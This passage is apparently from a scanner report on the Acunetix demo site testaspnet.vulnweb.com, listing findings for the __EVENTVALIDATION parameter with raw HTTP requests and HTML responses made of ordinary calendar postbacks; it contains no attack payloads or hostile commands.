Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1171 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,171 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8163&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCA6bGFMNoIZGRkQr8LPA2%2FoskDiuzdO%2BTP1SobX5M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL7hZakCgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPNtBfPW%2F6ntlgXyROPbh%2FvWhMR%2FM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:23 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCA6bGFMNoIZGRkQr8LPA2/oskDiuzdO+TP1SobX5M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL7hZakCgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPNtBfPW/6ntlgXyROPbh/vWhMR/M=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:White" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1107 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,107 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8467&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAfQ9oH9sIZGRkPjhgBHI5liQMGfm0N44CX3jVKAU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL7sLywBQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJWhkRO0H7R40QFlFN385tcH8cHPE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:22 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAfQ9oH9sIZGRkPjhgBHI5liQMGfm0N44CX3jVKAU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL7sLywBQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJWhkRO0H7R40QFlFN385tcH8cHPE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:White" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
